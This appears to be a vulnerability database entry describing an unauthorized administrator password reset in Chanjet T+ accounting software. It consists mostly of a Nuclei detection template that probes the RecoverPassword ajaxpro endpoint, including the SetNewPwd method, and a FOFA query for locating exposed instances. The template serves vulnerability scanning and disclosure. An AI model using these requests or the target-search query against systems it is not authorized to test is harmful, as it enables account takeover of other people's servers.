漏洞描述
There is an unauthorized administrator password modification vulnerability in UF Chanjet T+ RecoverPassword.aspx. An attacker can use this vulnerability to modify the administrator account password to log in to the backend.
chanjet-tplus-unauth-passreset: Chanjet Tplus - Unauthorized Password Reset
PoC代码[已公开]
id: chanjet-tplus-unauth-passreset
info:
name: Chanjet Tplus - Unauthorized Password Reset
author: 0xr2r
severity: high
description: |
There is an unauthorized administrator password modification vulnerability in UF Chanjet T+ RecoverPassword.aspx. An attacker can use this vulnerability to modify the administrator account password to log in to the backend.
reference:
- https://cn-sec.com/archives/1377207.html
- https://www.chanjet.com
metadata:
verified: true
max-request: 2
fofa-query: app="畅捷通-TPlus"
tags: tplus,unauth,chanjet,vuln
http:
- method: GET
path:
- "{{BaseURL}}/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method={{randbase(6)}}"
- "{{BaseURL}}/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd"
matchers:
- type: dsl
dsl:
- "contains(body_1, 'tplus”应用程序中的服务器错误')"
- "!contains(body_2, '>请重新登录')"
condition: and
# digest: 4a0a00473045022100ee5d76f9d0359b4ee9c5c226f78be63f4e09df7a7cfc957a6743cd00db4bc9340220267ccfcd5b21a7ce012ed96ac32d642ef92312d36a30820a7869a9fa0e21982d:922c64590222798bb761d5b6d8e72950